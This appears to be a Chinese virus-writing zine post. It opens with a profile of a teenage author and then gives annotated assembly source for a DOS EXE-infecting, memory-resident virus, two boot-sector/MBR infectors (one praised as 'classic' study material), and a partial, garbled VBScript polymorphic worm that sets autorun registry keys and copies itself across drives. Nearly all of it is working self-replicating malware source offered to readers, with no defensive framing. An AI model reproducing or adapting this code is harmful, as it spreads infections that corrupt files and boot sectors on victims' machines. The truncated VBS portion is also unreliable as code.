姓名:展姚
性别:女
年龄:17
英文名:cat
主要作品:X-cat,i-worm.snw12等
e-mail:suruixuan1@sina.com
;================== virus: baby Ver 1.01B2================
;=================== write begin: 2-7-2000 =================
;=================== finished : 2-7-2000 =================
;instruction:
;--I . The virus keep in memory (hook int 21h)
;
; II . It only infect EXE file
;
; III. Only when infected file larger than
; 1980 bytes,the virus would infect it.
;
; IV . The infected Mark is the infected file
;-- time was set TIME: SECOND => 12'22''
;
; * V . The virus can break READ_ONLY ATTRIB!!!
;
;--VI . The virus keeping in memory's Mark can
;-- get in this way :
;------+ MOV AX,30AE
;------+ INT 21
;
;-- * CX=04C6 => VIRUS has already been in memory
;-- * else => VIRUS hasn't been in memory
;===============================================================
--.radix 16
--.model tiny
--.286c
--.code
--org 0
start:
--push es--------;把原来的 PSP 压入栈堆
--call position------;呼叫 POSITION
position:----------;其实还可以用中断返回的方法读取当前偏移(反 DEBUG ^o^ )
--pop si--------;得到偏移 SI
--sub si,position-start----;得到入口偏移,存入SI
--push si--------;SI 入栈
--mov ax,30AE------;取 DOS 版本号(AE为通知同伴)
--int 21--------;实际为判断是否已驻留
--cmp cx,04c6------;CX=04C6 表明已驻留
--jne install------;不等,则驻留
--jmp run_host------;等,则运行原程序
install:
;================================================================
;You can add active code here: Don't too cruel!
;================================================================
active_check:
--mov ah,2a------;取日期
--int 21
--cmp dx,0c16------;是否为 12月22日
--jz active------;是,则发作
--jmp no_active------;不是,则转
active:
--push cs
--pop ds--------;置DS=CS
--push si
mov bl,COLOR1
--mov dx,offset active_mess-start--;计算发作信息绝对偏移
--add si,dx------;计算实际地址
--call write_on_screen----;显示发作信息
--mov ah,00------;读一字符后继续
int 16
pop si
push si
mov bl,COLOR2
mov dx,offset active_other_mess-start
add si,dx
call write_on_screen
--mov ah,00------;读一字符后继续
int 16
--pop si
--jmp run_host
;================================================================
no_active:
--mov ah,52------;取磁盘缓冲区地址
--int 21
--mov bx,es:[bx-2]----;取第一个 MCB 地址
--xor di,di------;清DI
loop_search:
--mov es,bx------;查找最后一个MCB地址
--add bx,word ptr es:[di+3]
--inc bx
--cmp byte ptr es:[di],5a
--jnz loop_search
;================Found Last MCB=========--
--mov bx,es------;保存找到的最后一个MCB地址----
--mov ax,word ptr es:[di+3]--;取最后一个MCB大小
--sub ax,vir_para------;剪去自己的PARA
--jnc keep_in_memory----;溢出则表明不够驻留
--jmp run_host------;否则继续
keep_in_memory:
--mov word ptr es:[di+3],ax--;改写最后一个MCB大小
--add bx,ax------;计算驻留区段地址
--inc bx
--mov es,bx------;并送入ES
--push cs
--pop ds--------;令DS=CS
--mov cx,vir_bytes----;将自己搬移
--cld
--rep movsb
;===============hook int 21============
; The virus in memory address is:[BX:0]
;======================================
--xor si,si
--mov ds,si------;挂接中断向量 21
mov dx,offset new_int21-start
--cli
--xchg ds:word ptr [21*4],dx
--xchg ds:word ptr [21*4+2],bx
--mov es:word ptr oldint21,dx
--mov es:word ptr oldint21+2,bx
--sti
;==============run host================
run_host:
--push cs--------
--pop ds
--pop si
mov di,offset old_header-start
--add di,si
--mov al,byte ptr [di]----;将OLD_HEADER前两个字符相加
--add al,byte ptr [di+1]----;后送入AL
--cmp al,0a7------;比较AL是否等于0A7
--jne run_com------;(4D+5A=0A7)
--jmp run_exe
run_com:
;=======================================
;You can add run .com file here!
;=======================================
--int 20
run_exe:
mov di,offset old_header-start
--add di,si------;将OLD_HEADER 地址送入DI
--pop cx--------;原PSP出栈
--mov dx,cx------
--add dx,10------;原PSP +10H
--mov ax,word ptr [di+0e]----;原程序SS 偏移送入AX
--add ax,dx------;计算SS 初值
--mov ss,ax
--mov ax,word ptr [di+10]----;原程序SP送入AX
--mov sp,ax
--mov ax,word ptr [di+16]----;原程序CS 偏移送入AX
--add ax,dx------;计算CS初值
--mov bx,word ptr [di+14]----;原程序IP送入BX
--mov ds,cx------;置DS
--mov es,cx------;置ES
--push ax--------;原CS入栈
--push bx--------;原IP入栈
--xor ax,ax
--xor bx,bx------;清 AX,BX,CX,DX,SI,DI,BP
--xor cx,cx
--xor dx,dx
--xor si,si
--xor di,di
--xor bp,bp
--retf--------
;=========================================
new_int21:
--pushf--------;标志入栈
--cmp ax,30AE------;是否为同伴在呼叫
--jne next------;不是,则转
--call dword ptr cs:oldint21--;是,则响应
--mov cx,04c6
--iret--
next:
--cmp ah,4bh------;是否为运行程序
--jz infect------;是,则去感染
--pusha--------;否,则呼叫原INT21
--push ds
--push es
--jmp exit_int21
exit_int21_0:
--mov ah,3e------;关闭文档
--call calloldint21
exit_int21:
--pop es--------;寄存器出栈
--pop ds
--popa
--popf--------;标志出栈
jmp dword ptr cs:oldint21 ;呼叫原INT21返回,执行原程序
infect:
--pusha--------;寄存器入栈
--push ds
--push es
--mov ax,4300
--call calloldint21----;取文档属性
--mov word ptr cs:file_attrib,cx--;保存原属性
--mov ax,4301------;置成普通文档
--mov cx,20
--call calloldint21
--mov ax,3d02------;开档
--call calloldint21
--jnc con1------;没错,则继续
--jmp exit_int21------;错,则离开
con1:
--xchg ax,bx------;保存HANDLE
--mov ax,5700------;取文档时间
--call calloldint21
--and cx,7ff
--cmp cx,18bH------;文档修改时间是否为: 12分22秒
--jnz con2------;不是继续
--jmp exit_int21_0----;是,不感染
con2:
--push cs--
--push cs--
--pop ds
--pop es--------;置DS=ES=CS
--lea dx,old_header----;读文档前20H 个字符
--mov cx,20
--mov ah,3f
--call calloldint21
--jnc con3
--jmp exit_int21_0
con3:
--lea si,old_header----;复制文档头前20H 个字符
--lea di,vir_header
--mov cx,20
--cld
--rep movsb
--lea di,vir_header
--mov al,byte ptr [di]----;判断文档是否为.EXE FILE
--add al,byte ptr [di+1]
--cmp al,0a7
--jnz infect_com
--jmp infect_exe
infect_com:
;=======================================
;You can add infect .com file here!
;=======================================
--jmp exit_int21_0----;是.COM 档则离开
infect_exe:
--call check_size------;去文档长度
--cmp dx,0
--jnz con6
--cmp ax,07bc------;文档长度>1980则感染
--ja con6--------;否则退出
--jmp exit_int21_0
con6:
--push ax--------;保存文档长度 DX:AX
--push dx----
--add ax,vir_bytes----;计算感染后的文档长度
--adc dx,0------;并回写
--mov cx,200
--div cx
--or dx,dx
--jz con7
--inc ax
con7:
--mov word ptr [di+2],dx
--mov word ptr [di+4],ax--
--pop dx--------;取回文档长度
--pop ax----
--mov cx,10------;(DX:AX/10)后 AX 为 PARA数
--div cx--------;DX 为余数
--sub ax,word ptr [di+08]----;剪去文档头的PARA数
--mov word ptr [di+14],dx----;此时,DX为感染后的IP
--mov word ptr [di+16],ax----;AX为感染后的SS,CS
--mov word ptr [di+0e],ax
--add dx,4000------;新SP等于新IP+4000
--mov word ptr [di+10],dx----;送入SP
set_time_exit:
--mov ax,4200------;将修改后的文档头回写
--xor cx,cx------
--xor dx,dx
--call calloldint21
--mov dx,di
--mov cx,20
--mov ah,40
--call calloldint21
--jnc con5
--jmp exit_int21_0
con5:
--call check_size------;移动文档指针到文档尾
--lea dx,start
--mov cx,vir_bytes----;将自己写入
--mov ah,40
--call calloldint21----;置文档时间为: 12分22秒
--mov ax,5700
--call calloldint21
--and cx,0f800
--or cx,18bh
--mov ax,5701
--call calloldint21
--mov ah,3e------;闭档
--call calloldint21
--pop es
--pop ds
--popa
--pusha
--push ds
--push es
--mov cx,word ptr cs:file_attrib--;取原文档属性
--mov ax,4301------;置回原文档属性
--call calloldint21
--jmp exit_int21------;离开
;===============================
check_size:----; 作用: 1. 读文档大小 2.将文件指针移到文档尾部
--mov ax,4202
--xor cx,cx
--xor dx,dx
--call calloldint21
--ret
;===============================
calloldint21:----;呼叫就的中断 21h
--pushf
--call dword ptr cs:oldint21
--ret
;===============================
write_on_screen:----; 直接写屏
--push es
--mov ax,0003
--int 10
--mov dx,0b800
--mov es,dx
--xor di,di
--cld
loop_write:
--lodsb
--or al,al
--jnz read_con
--pop es
--ret
read_con:
--stosb
mov es:byte ptr [di],bl
--inc di
--jmp loop_write
;===============================
;--My cute Virus Data
;===============================
old_header db 0cdh,20,1e dup(0)
active_mess db ' Warning! Warning! VIRUS Warning!',2e dup(20)
db ' Hi! You notice here! VIRUS : BABY ( Ver 1.00B ) has come!',15 dup(20)
db ' Guess What will I do, NEXT ? Press any key to get the ANSWER...',0f DUP(20),0
COLOR1 EQU 0CF
active_other_mess db 50 dup(20)
db ' It is only a joke, I will not harm you! Today is ANDY birthday, so I will do '
db ' nothing today! Have a good day! Bye!',7bh dup(20),0
COLOR2 EQU 1E
vir_bytes equ $-offset start
vir_para equ (vmem+0f)/10
vir_header db-- 20 dup(0)
oldint21 dd--?
file_attrib dw ?
vmem equ $-offset start
;==================================
--end--start
--
第二段是一个引导区病毒。。。大家看看就行了(自从某杀毒软件使用原始地址清除法毙了所有的引导区病毒后就没有人再写了。不过我们也可以以其人之道还之其人之身。。。)
CSEG SEGMENT
ASSUME CS:CSEG
BEGIN: MOV AX,CS
CMP AX,0
JZ START
JMP FILE
;********************************** DATA
DATE DB 00H
PZ DB 77H
TIME DW 200H
JMPA DW 7C00H
DW 0000H
JMPN DW OFFSET NEXT
DW 0020H
FN DB 'PLAY.COM',0
;************************************
START: XOR AX,AX
MOV DS,AX
MOV SS,AX
MOV ES,AX
MOV SP,7C00H
MOV AX,DS:[20H] ;SAVE INT 8H
MOV DS:[180H],AX
MOV AX,DS:[22H]
MOV DS:[182H],AX
MOV SI,SP
MOV DI,0200H
MOV CX,0200H
CLD
REP MOVSB
MOV BX,OFFSET JMPN+7C00H
JMP DWORD PTR CS:[BX]
NEXT: MOV AX,OFFSET NEW08 ;MODI INT 8H
MOV DS:[20H],AX
MOV AX,0020H
MOV DS:[22H],AX
MOV BX,0600H
MOV AX,0201H
MOV CX,0001H
MOV DX,0080H
INT 13H
CMP BYTE PTR ES:[PZ+0600H],077H
JZ NC
MOV AX,0301H
MOV CX,0017H
MOV DX,0080H
INT 13H
MOV SI,0200H
MOV DI,0600H
MOV CX,0200H
CLD
REP MOVSB
MOV AX,0301H
MOV CX,0001H
MOV DX,0080H
INT 13H
NC: MOV BX,7C00H
MOV AX,0201H
MOV CX,0017H
MOV DX,0080H
INT 13H
MOV AH,04H
INT 1AH
MOV CS:[DATE],DL
MOV BX,OFFSET JMPA
JMP DWORD PTR CS:[BX]
;***********************************RUN HD BOOTER PRG
NEW08: PUSH AX
PUSH DS
DEC CS:[TIME]
JNZ I08
XOR AX,AX
MOV DS,AX
MOV AX,DS:[4CH]
MOV DS:[184H],AX
MOV AX,DS:[4EH]
MOV DS:[186H],AX
MOV AX,OFFSET GR ;MODI INT 8H
MOV DS:[20H],AX
MOV AX,OFFSET NEW13
MOV DS:[4CH],AX
MOV AX,OFFSET NEWF
MOV DS:[94H],AX
MOV AX,0020H
MOV DS:[22H],AX
MOV DS:[4EH],AX
MOV DS:[96H],AX
MOV CS:[TIME],200H
I08: POP DS
POP AX
INT 60H
IRET
;***************************************
NEW13: CMP AH,02H
JZ CNE
CMP AH,03H
JNZ I13
CMP DL,00H
JNZ CNE
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH CS
POP ES
MOV AX,0301H
XOR BX,BX
MOV CX,0001H
MOV DX,BX
INT 61H
POP ES
POP DX
POP CX
POP BX
POP AX
JMP I13
CNE: CMP DX,0080H
JNZ I13
CMP CX,0001H
JNZ I13
MOV CX,0017H
I13: INT 61H
IRET
;*******************************************
NEWF: PUSH CS
POP DS
MOV DX,OFFSET FN
MOV CX,00000001B
MOV AH,3CH
INT 21H
MOV BX,AX
MOV AH,40H
MOV CX,400H
XOR DX,DX
INT 21H
MOV AH,3EH
INT 21H
MOV AX,0003H
INT 10H
JMP NCF
GR: PUSH AX
PUSH BX
PUSH CX
MOV AX,0900H
MOV CX,0001H
CMP CS:[DATE],15H
JZ GR1
MOV BX,111B
GR1: INT 10H
NG: POP CX
POP BX
POP AX
INT 60H
IRET
;************************************
FILE: PUSH CS
POP ES
XOR AX,AX
MOV DS,AX
CMP BYTE PTR DS:[200H+PZ],77H
JZ NCF
MOV AH,77H
MOV DS:[200H+PZ],AH
MOV BX,0300H
MOV AX,0201H
MOV CX,0001H
MOV DX,0080H
INT 13H
MOV AX,0301H
MOV CX,0017H
MOV DX,0080H
INT 13H
PUSH CS
POP DS
MOV SI,0100H
MOV DI,BX
MOV CX,01B0H ;CX 1B0H
CLD
REP MOVSB
MOV AX,0301H
MOV CX,0001H
MOV DX,0080H
INT 13H
NCF: MOV AH,4CH
INT 21H
CSEG ENDS
END BEGIN
第三段非常经典,大家一定要好好看,可以受益不少
CSEG SEGMENT
ASSUME CS:CSEG
;** PART 1:文件部分 *****************************************************
START: JMP BEGIN
B_IP DW 7777H ;|----------------------;存放原文件的CS:IP
B_CS DW 7777H ;| ;初始值的变量
FNEXE DB '*.EXE';|----------------------;EXE文件通配名
N_IP DW 0 ;|--------------------------;存放感染后文件的
N_CS DW 0 ;| ;CS:IP初始值变量
B_EXE DW 0 ;|--------------------------;用于放置计算结
H_EXE DW 0 ;| ;果的两个变量
DISP PROC ;|
JMP COUN1 ;|
M_WORD:DB '*I am sorry to bother you. *' ;|
DB 0AH,0DH ;|
DB '*I will not damage your PC.*' ;|
DB 0AH,0DH ;|
DB '$' ;|
;|
COUN1: MOV DX,CS ;|
MOV DS,DX ;|;表现模块:
MOV DX,OFFSET M_WORD ;|;显示:"我很抱谦打扰你.
MOV AH,09H ;| 我不会破坏你的
INT 21H ;| 电脑."
RET ;|
DISP ENDP ;|
BEGIN: PUSH DS
PUSH ES
CALL DISP
XOR AX,AX ;|
MOV DS,AX ;|--------;检查是否已驻留内存
CMP DS:[21FH],BYTE PTR 77H ;| ;是->转HBG 否->继续
JZ HBG ;|
MOV DS:[21FH],BYTE PTR 77H ;|--------;置内存驻留标志
MOV AX,CS ;|
MOV DS,AX ;|
MOV SI,OFFSET HDP ;|
MOV AX,22H ;|
MOV ES,AX ;|-----;将驻留部分移至内存
XOR DI,DI ;| ;0022H:0000H处
MOV CX,OFFSET MAIN-OFFSET HDP ;|
CLD ;|
REP MOVSB ;|
XOR AX,AX ;| ;保存原中断10H,13H
MOV DS,AX ;|-------------------------;至85H和86H
CALL SM ;| ;并修改使之指向新中断部分
MOV AX,CS
MOV DS,AX
MOV ES,AX
MOV AX,0201H ;|
MOV BX,OFFSET P_SIZE;|
MOV CX,0001H ;|---------------;读主引导扇区
MOV DX,0080H ;|
INT 86H ;|
CMP DS:[BX],BYTE PTR 0FAH;|----------;是否已被感染
JNZ HBG ;| ;是->转HBG 否->继续
MOV CX,0004H ;|
MOV AX,0301H ;|----------------------;将原主引导扇区写入
MOV DX,0080H ;| ;0面0道4扇区
INT 86H ;|
MOV DI,OFFSET P_SIZE ;|
MOV SI,OFFSET HDP ;|
MOV CX,OFFSET MAIN-OFFSET HDP ;|-----;将引导部分覆盖引导程序
CLD ;| ;不破坏硬盘分区表
REP MOVSB ;|
MOV AX,0301H ;|
MOV CX,0001H ;|----------------------;将引导部分写入主引导扇区
MOV DX,0080H ;|
INT 86H ;|
MOV AX,0302H ;|
XOR BX,BX ;|
MOV CX,0002H ;|----------------------;将自身全部代码写入2,3扇区
MOV DX,0080H ;|
INT 86H ;|
HBG: POP ES
POP DS
MOV AX,DS ;|
ADD AX,10H ;|-----------;执行被感染的原程序
ADD CS:[B_CS],AX ;|
JMP DWORD PTR CS:[B_IP] ;|
;** PART 2:引导部分 *****************************************************
HDP: JMP DP
TIME DW 180H ;|---------------------;计时数:当为0时就修改中断
JMPA DW 7C00H ;|---------------------;启动时系统就将引导程序装
DW 0000H ;| ;入此地址运行;病毒程序也
;会将原引导程序装入此地址
JMPN DW OFFSET NEXT-OFFSET HDP ;|----;引导部分将自身转移后继续
DW 0022H ;| ;运行的地址
JMP_MAIN DW OFFSET MAIN ;|---------------;装入后的感染部分在
DW 8000H ;| ;内存中的地址
DP: XOR AX,AX
MOV DS,AX
MOV ES,AX
MOV SS,AX
MOV SP,7C00H
MOV SI,SP ;|
MOV DI,220H ;|
MOV CX,OFFSET MAIN-OFFSET HDP ;|
CLD ;|将自身移至22H:00H后,继续
REP MOVSB ;|运行
MOV BX,OFFSET JMPN-OFFSET HDP+7C00H ;|
JMP DWORD PTR CS:[BX] ;|
NEXT: MOV BX,7C00H ;|
MOV AX,0201H ;|
MOV CX,0004H ;|----------------------;读原主引导扇区
MOV DX,0080H ;|
INT 13H ;|
MOV DS:[21FH],BYTE PTR 77H;|---------;置内存驻留标志
MOV AX,DS:[20H] ;|
MOV DS:[210H],AX ;|------------------;使中断84H指向中断08H
MOV AX,DS:[22H] ;|
MOV DS:[212H],AX ;|
MOV AX,OFFSET NEW08H-OFFSET HDP ;|
MOV DS:[20H],AX ;|---;将中断08H指向NEW08H程序块
MOV AX,CS ;|
MOV DS:[22H],AX ;|
MOV BX,OFFSET JMPA-OFFSET HDP ;|-----;执行原引导程序
JMP DWORD PTR CS:[BX]
;** PART 3:新中断部分 ****************************************************
NEW08H:DEC WORD PTR CS:[TIME-HDP] ;|--------;新中断08H的作用
JNZ I08 ;| ;检测计时数是否为0
PUSH AX ;| ;是->改回中断08H,并
PUSH DS ;| ; 保存并修改原中
;| ; 断10H,13H使之指
XOR AX,AX ;| ; 新中断部分
MOV DS,AX ;| ;否->执行原中断08H
;|
MOV AX,DS:[210H] ;|
MOV DS:[20H],AX ;|
MOV AX,DS:[212H] ;|
MOV DS:[22H],AX ;|
CALL SM ;|
;|
POP DS ;|
POP AX ;|
I08: INT 84H ;|
IRET ;|
SM PROC ;|---;子程序SM的作用:
MOV AX,DS:[40H] ;| ;将中断10H,13H分别保存
MOV DS:[214H],AX ;| ;至85H,86H,并修改10H,13H
MOV AX,DS:[42H] ;| ;指向新中断部分
MOV DS:[216H],AX ;|
;|
MOV AX,DS:[4CH] ;|
MOV DS:[218H],AX ;|
MOV AX,DS:[4EH] ;|
MOV DS:[21AH],AX ;|
;|
MOV AX,OFFSET NEW10H-OFFSET HDP ;|
MOV DS:[40H],AX ;|
MOV AX,22H ;|
MOV DS:[42H],AX ;|
;|
MOV AX,OFFSET NEW13H-OFFSET HDP ;|
MOV DS:[4CH],AX ;|
MOV AX,22H ;|
MOV DS:[4EH],AX ;|
RET ;|
SM ENDP ;|
NEW10H:CMP AH,00 ;|-;新中断10H的作用:
JZ N1 ;| ;检测是否调用功能00H
INT 85H ;| ;是->将主代码装入内存
IRET ;| ; 并执行
N1: PUSH AX ;| ;否->调用原中断10H
PUSH BX ;|
PUSH CX ;|
PUSH DX ;|
PUSH DS ;|
PUSH ES ;|
;|
MOV AX,8000H ;|
MOV ES,AX ;|
;|
MOV AX,0202H ;|
XOR BX,BX ;|
MOV CX,0002H ;|
MOV DX,0080H ;|
INT 13H ;|
;|
MOV BX,OFFSET JMP_MAIN-OFFSET HDP ;|
JMP DWORD PTR CS:[BX]
NEW13H:PUSHF ;|----------------------;新中断13H的作用:
CMP CX,0001H ;| ;检测是否读主引导扇区
JNZ NGW ;| ;是->读0面0道4扇区
CMP AH,02H ;| ;否->调用原中断13H
JNZ NGW ;|
CMP DX,0080H ;|
JNZ NGW ;|
;|
MOV CX,0017H ;|
NGW: POPF ;|
INT 86H ;|
IRET ;|
;** PART 4:传染部分 ******************************************************
MAIN: MOV AX,CS
MOV ES,AX
MOV DS,AX
MOV AH,1AH ;|
MOV DX,OFFSET DTA ;|-----------------;设置DTA(磁盘传输地址)
INT 21H ;|
MOV AH,4EH ;|
JMP DIR ;|
SDIR: MOV AH,4FH ;| ;在当前目录中搜索第一个
DIR : MOV DX,OFFSET FNEXE ;|---------------;EXE文件
MOV CX,100111B ;| ;找到->继续
INT 21H ;| ;没找到->转HW
JC HW ;|
CMP DS:[T_L],BYTE PTR 77 ;| ;检测是否已感染
JZ SDIR ;| ;是->搜索下一个EXE文件
MOV CX,DS:[S_H] ;| ; 直到找到或搜索完
CMP CX,09H ;|----------; 目录为止
JNB SDIR ;| ;否->实施传染
;| ;注:如果文件已感染或文
CALL GR ;| ; 长度超过90000H都不
; 会传染.
HW: POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
INT 85H ;|---------------------------;执行原中断10H
IRET
GR PROC ;|------------------------------;子程序GR作用:
;传染EXE文件
MOV DX,OFFSET FN ;|
MOV AX,4301H ;|-----------------;置文件属性为:普通
MOV CX,100000B ;|
INT 21H ;|
MOV AX,3D02H
INT 21H ;|-----------------;打开文件
MOV BX,AX
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,8H ;|
INT 21H ;|--------------;读文件头节长度
MOV AH,3FH ;|
MOV CX,2H ;|
MOV DX,OFFSET H_EXE ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,14H ;|
INT 21H ;|---------------;保存原文件的 CS:IP
MOV AH,3FH ;| ;初始值
MOV CX,4H ;|
MOV DX,OFFSET B_IP ;|
INT 21H ;|
MOV AX,4202H ;|
XOR CX,CX ;|
XOR DX,DX ;|
INT 21H ;|
MOV DX,DS:[S_H] ;|
MOV AX,DS:[S_L] ;|
MOV CX,10H ;| ;使原文件的长度为10H的
DIV CX ;|-----------------;倍数,目的是为了使自身
INC AX ;| ;能运行在CS:00的环境下
SUB AX,DS:[H_EXE] ;|
MOV DS:[N_CS],AX ;|
SUB CX,DX ;|
PUSH CX ;|
MOV AH,40H ;|
INT 21H ;|
MOV AH,40H ;|
MOV CX,OFFSET P_SIZE ;|--------------;将自身附加在文件结尾
XOR DX,DX ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,02H ;|
INT 21H ;|
MOV DX,DS:[S_H] ;|
MOV AX,DS:[S_L] ;|
POP CX ;|
ADC AX,CX ;| ;将新文件的长度转换成
JNC NC1 ;| ;(页长度+最后一个扇区字节数)
INC DX ;|-----------;的形式
NC1: ADC AX,OFFSET P_SIZE ;| ;并将此结果写入EXE文件头
JNC NC2 ;|
INC DX ;|
NC2: MOV CX,200H ;|
DIV CX ;|
INC AX ;|
MOV DS:[B_EXE],DX ;|
MOV DS:[H_EXE],AX ;|
MOV DX,OFFSET B_EXE ;|
MOV CX,4H ;|
MOV AH,40H ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,14H ;|
INT 21H ;|-------------;将计算后的新CS:IP初始值写
MOV AH,40H ;| ;入EXE文件头
MOV CX,4H ;|
MOV DX,OFFSET N_IP ;|
INT 21H ;|
MOV AX,5701H ;|
MOV CH,DS:[T_H] ;| ;改回文件修改日期并打上
MOV CL,77 ;|----------------;已感染标志
MOV DX,DS:[D] ;|
INT 21H ;|
MOV AH,3EH ;|---------------------;关闭文件
INT 21H ;|
MOV DX,OFFSET FN ;|
MOV AX,4301H ;|
XOR CH,CH ;|---------------;改回文件属性
MOV CL,DS:[C] ;|
INT 21H ;|
RET ;|
GR ENDP
;|---------------;DTA(磁盘传输地址)的格式如下:
DTA DB 21 DUP(0) ;|---------------;DOS功能4FH将使用这些字节
C DB 0 ;|---------------;文件属性
T_L DB 0 ;|---------------;文件时间的低位
T_H DB 0 ;|---------------;文件时间的高位
D DW 0 ;|---------------;文件日期
S_L DW 0 ;|---------------;文件长度的低位
S_H DW 0 ;|---------------;文件长度的高位
FN DB 13 DUP(0) ;|---------------;文件的全名
P_SIZE:
CSEG ENDS
END START
;****************************************************************************
;* 此文件(CV2.ASM)可用MASM和LINK编译成可执行文件. *
;* 第一次运行时会造成死机.重新启动机器后,病毒已 *
;* 驻留内存. *
************************************************************************
下次我们的老大ATM将向大家介绍win9x/Me/NT/2000/xp virus (只是一只而已,不过很全的几乎包含了atm所有的病毒技术了)
下面是Squirrel 的一只新毒的测试版
'a vbs virus
'一只有多变体能力的病毒
On Error Resume Next
dim wscr,rr,htmlvirus,vbss,file,fso,vbscopy,pass,conta,contb,vbscopya,dexorstring,psa,dexortie
Set fso = CreateObject("Scripting.FileSystemObject")
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout",0,"REG_DWORD"
end if
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
dexorstring="
Dim lngq As Long
Randomize Rnd(-1)
For lngq = 1 To Len(ps)
Randomize Rnd(-Rnd * Asc(Mid(ps, lngq, 1)))
Next lngq
Dim lngz As Long
Dim ints As Long
Dim lngx As Long
For lngx = 1 To Len(ts)
lngz = Asc(Mid(ts, lngx, 1))
ints = Int(Rnd * 256)
Mid(ts, lngx, 1) = Chr(lngz Xor ints)
Next lngx
Dim lngC As Long
Dim lngD As Long
Dim lngE As Long
Dim lngA As Long
Dim lngB As Long
Dim lngN As Long
Dim lngJ As Long
Dim lngK As Long
Dim strB As String
lngA = Len(ts)
lngB = lngA - 1 - (lngA - 1) / 4
strB = Space(lngB)
For lngN = 1 To lngB
lngJ = lngJ + 1
lngC = Asc(Mid(ts, lngJ, 1)) - 59
Select Case lngN Mod 3
Case 1
lngK = lngK + 4
If lngK > lngA Then lngK = lngA
lngE = Asc(Mid(ts, lngK, 1)) - 59
lngD = ((lngE / 16) And 3) * 64
Case 2
lngD = ((lngE / 4) And 3) * 64
Case 0
lngD = (lngE And 3) * 64
lngJ = lngJ + 1
End Select
Mid(strB, lngN, 1) = Chr(lngC Or lngD)
Next lngN
vbscopy = strB"
dexortie="
dim k as long
dim length as integer
dim passc
length=len(ps)
for k=1 to 128
passc=ps+asc(mid(ps,k,1))*256*k
next k
passc=-passc
dim flength as long
dim size as long
dim byteblock() as byte
dim j as long
dim position as long
flength=lof(ts)
size=flength
rnd(passc)
byteblock=ts
for j=1 to size
byteblock(j)=byteblock(j) xor int(rnd*256)
next j
ts=byteblock"
sub main()
Dim known
Set known = CreateObject("WScript.shell")
If known.RegRead("HKEY_CURREN_USER/Squirrels2001", "vbs") <> "die" Then
passaa()
cont()
exor(pass)
dim c
set c=fso.createtextFile("%windir%"&"/system32/"&"Squirrel2001.vbs")
c.write"On Error Resume Next "
c.write"dim"&""&conta&","&contb&","&"ts"&","&"ps"
c.wrtte"dim reg"
c.write"set reg=createobject('wscript.shell')
c.write"reg.RegWrite 'HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting Host/Settings/Timeout',0,'REG_DWORD'"
c.write conta&"="&pass
c.write contb&"="&vbscopya
c.write"ts="&contb
c.write"ps="&conta
c.write dexorstring
c.write"dim ass,ff,dd"
c.write"set ass = CreateObject('Scripting.FileSystemObject') "
c.write"set dd=ass.createtextfile('%windir%/'"&conta&contb&"'.vbs')"
c.write"dd.write vbscopy"
c.write"dd.close"
c.write"shell('%windir%/'"&conta&contb&"'.vbs')"
c.close
set c=nothing
known.regwirte "HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run/MSKernel32","%WINDIR%"&"/system32/Squirrel2001.vbs"
set c=fso.opentextfile("%windir%"&"/system32/"&"Squirrel2001.vbs")
psa=c.readall
c.close
mailsend()
copyvirus()
else
killdatea()
end if
end sub
sub copyvirus()
Dim objfso As New Scripting.FileSystemObject
Dim drvloop As Scripting.Drive
For Each drvloop In objfso.Drives
If drvloop.DriveType = Fixed Or drvloop.IsReady Then
If drvloop.DriveType = 3 Then
virussafe drvloop.driveletter&":/"
End If
End If
Next drvloop
Set objfso = Nothing
known.RegWrite("HKEY_CURREN_USER/Squirrel2001/vbs","die",REG_STRING)
end sub
Sub virussafe(strpath As String)
Dim objfolder As Scripting.Folder
Dim objfile As Scripting.File
Dim objsubdirs As Scripting.Folders
Dim sobj As Scripting.FileSystemObject
Dim sobjv, c, fs
Dim a As String
Dim ca As Scripting.TextStream
Dim objloopfolder As Scripting.Folder
Set sobjv = CreateObject("Scripting.FileSystemObject")
Set sobj = New Scripting.FileSystemObject
Set objfolder = sobj.GetFolder(strpath)
For Each objfile In objfolder.Files
If UCase$(Right$(objfile.ShortPath, 4)) = ".vbs" Then
If objfile.Path <> Appliction.Name Then
copyin(objfile.fullpath)
End If
End If
Next objfile
Set objsubdirs = objfolder.SubFolders
For Each objloopfolder In objsubdirs
virussafe objloopfolder.Path
Next objloopfolder
Set objsubdirs = Nothing
Set objfolder = Nothing
End Sub
sub passaa()
pass=""
dim i,usechar,word
i=0
usechar="QWERTYUIOP{ }ASDFGHJKL:ZXCVBNM<>?~!@#$%^&*()_+|*/-qwertyuiop[]asdfghjkl;'zxcvbnm,./`1234567890-=/"
word=""
Randomize
for i=0 to 32
word=word+Mid(usechar,Le(usechar)*rnd+1,1)
next i
pass=(year(now)+800)*month(now)*day(now)*(time(now)+100)+word
end sub
sub cont()
conta=""
contb=""
dim i,usechar,word
i=0
usechar="QWERTYUIOPASDFGHJKLZXCVBNM"
word=""
Randomize
for i=0 to 12
word=word+Mid(usechar,Le(usechar)*rnd+1,1)
next i
conta=word
dim kk
word=""
Randomize
for kk=0 to 12
word=word+mid(usechar,Le(usechar)*rnd+1,1)+mid(conta,Le(conta)*rnd+1,1)
next kk
contb=word*year(now)*256-1
end sub
sub exor(mstrKey as string)
vbscopya=""
Dim lngN As Long
Randomize Rnd(-1)
For lngN = 1 To Len(mstrKey)
Randomize Rnd(-Rnd * Asc(Mid(mstrKey, lngN, 1)))
Next lngN
Dim lngC As Long
Dim intB As Long
Dim lngx As Long
For lngx = 1 To Len(vbscopy)
lngC = Asc(Mid(vbscopy, lngx, 1))
intB = Int(Rnd * 256)
Mid(vbscopy, lngx, 1) = Chr(lngC Xor intB)
Next lngx
Dim lngz As Long
Dim lngs As Long
Dim lngJ As Long
Dim lngK As Long
Dim lngA As Long
Dim str As String
lngA = Len(vbscopy)
